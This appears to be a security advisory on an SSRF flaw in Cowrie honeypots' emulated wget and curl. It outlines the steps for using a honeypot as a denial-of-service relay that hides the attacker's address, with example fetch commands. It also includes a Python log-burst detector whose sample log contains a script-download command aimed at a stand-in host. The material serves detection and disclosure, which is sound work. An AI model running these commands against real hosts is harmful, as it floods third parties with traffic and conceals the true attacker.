Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.
Cowrie honeypots are vulnerable to a Server-Side Request Forgery (SSRF) attack, allowing attackers to leverage the honeypot to launch denial-of-service (DoS) attacks against external targets. This vulnerability stems from the emulated wget and curl commands within Cowrie, enabling attackers to trigger unbounded HTTP traffic from the honeypot's IP address, effectively masking their origin and amplifying the attack's impact.
Step 1: Access Cowrie Honeypot: The attacker gains access to the Cowrie honeypot, likely through a successful credential brute-force or by exploiting another vulnerability.
Step 2: Command Injection: The attacker interacts with the emulated shell and issues a crafted command using either wget or curl, specifying a malicious URL as the target. For example: wget http://target.example.com/ or curl http://target.example.com/.
Step 3: SSRF Trigger: The emulated wget or curl command, lacking input validation, processes the attacker-supplied URL and initiates an outbound HTTP request to the specified target.
Step 4: Amplification and DoS: The attacker repeats the command, potentially using scripting or automation, to generate a large volume of HTTP requests from the Cowrie honeypot to the target. Without rate limiting, the honeypot continuously sends requests, overwhelming the target server and causing a denial-of-service condition.
Step 5: Source Address Masking: The target server sees the requests originating from the Cowrie honeypot's IP address, effectively masking the attacker's true source.
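From the defender's side, the five steps above leave a clear trace: a single honeypot session issuing many wget or curl commands aimed at the same external host within a short window. The following script, written for this page and not part of Cowrie itself, parses Cowrie's JSON event log (the `cowrie.command.input` event with its `session`, `src_ip`, `input` and `timestamp` fields) and flags such bursts. The log lines are constructed for the example; the threshold and window values are assumptions a site would tune.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed sample of Cowrie JSON log lines. Field names follow Cowrie's
# cowrie.json output; sessions, addresses and hosts are made up for this example.
# One session fires six fetches at the same host in five seconds, another issues
# a single download, and one line is truncated to exercise the decode guard.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","session":"a1b2c3d4e5f6","src_ip":"198.51.100.7","timestamp":"2024-05-01T10:00:00.000000Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"198.51.100.7","input":"uname -a","timestamp":"2024-05-01T10:00:01.000000Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"198.51.100.7","input":"wget http://target.example.com/","timestamp":"2024-05-01T10:00:02.000000Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"198.51.100.7","input":"curl http://target.example.com/","timestamp":"2024-05-01T10:00:03.000000Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"198.51.100.7","input":"wget http://target.example.com/","timestamp":"2024-05-01T10:00:04.000000Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"198.51.100.7","input":"wget http://target.example.com/","timestamp":"2024-05-01T10:00:05.000000Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"198.51.100.7","input":"curl http://target.example.com/","timestamp":"2024-05-01T10:00:06.000000Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3d4e5f6","src_ip":"198.51.100.7","input":"wget http://target.example.com/","timestamp":"2024-05-01T10:00:07.000000Z"}
{"eventid":"cowrie.command.input","session":"f6e5d4c3b2a1","src_ip":"203.0.113.9","input":"curl -O http://example.net/x.sh","timestamp":"2024-05-01T10:05:00.000000Z"}
{"eventid":"cowrie.command.input","session":"f6e5d4c3b2a1"
"""

FETCH_CMD = re.compile(r"^\s*(?:wget|curl)\b")
URL_RE = re.compile(r"""https?://[^\s'"]+""")
TS_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"


def parse_events(text):
    """Return the command-input events from a cowrie.json text, skipping
    other event types and lines that are not valid JSON."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if ev.get("eventid") != "cowrie.command.input":
            continue
        ev["ts"] = datetime.strptime(ev["timestamp"], TS_FMT)
        events.append(ev)
    return events


def fetch_commands(events):
    """Keep only wget/curl invocations, paired with the host they target."""
    out = []
    for ev in events:
        if not FETCH_CMD.match(ev["input"]):
            continue
        m = URL_RE.search(ev["input"])
        host = urlparse(m.group(0)).hostname if m else None
        out.append((ev["session"], ev["src_ip"], ev["ts"], host))
    return out


def detect_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Flag each (session, source, host) triple whose fetch count inside any
    sliding window of `window` reaches `threshold`; the count reported is the
    largest number of fetches seen in one window."""
    per_key = defaultdict(list)
    for session, src_ip, ts, host in fetch_commands(events):
        per_key[(session, src_ip, host)].append(ts)

    alerts = []
    for (session, src_ip, host), stamps in per_key.items():
        stamps.sort()
        start, max_count = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window's left edge
                start += 1
            max_count = max(max_count, end - start + 1)
        if max_count >= threshold:
            alerts.append({"session": session, "src_ip": src_ip, "host": host,
                           "count": max_count, "first": stamps[0], "last": stamps[-1]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(parse_events(SAMPLE_LOG)):
        print(f"{alert['src_ip']} session {alert['session']}: "
              f"{alert['count']} fetches to {alert['host']} "
              f"between {alert['first']} and {alert['last']}")
```

Run against a real `cowrie.json`, the same functions take the file's text in place of `SAMPLE_LOG`. The alert keys on session and destination host rather than on the raw command string, so alternating between wget and curl, or changing the path on the same host, does not split the count.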
The vulnerability lies within Cowrie's emulated shell environment, specifically in the implementation of wget and curl. These emulations, designed to mimic the behavior of the real commands, fail to implement proper input validation or rate limiting on outbound HTTP requests. The root cause is the lack of checks on the destination URL provided by the attacker, allowing them to specify any arbitrary target. The absence of rate limiting allows for the repeated invocation of these commands, leading to an unbounded number of HTTP requests. This design flaw allows attackers to use the honeypot as an amplification node, directing traffic towards a target and masking their own IP address.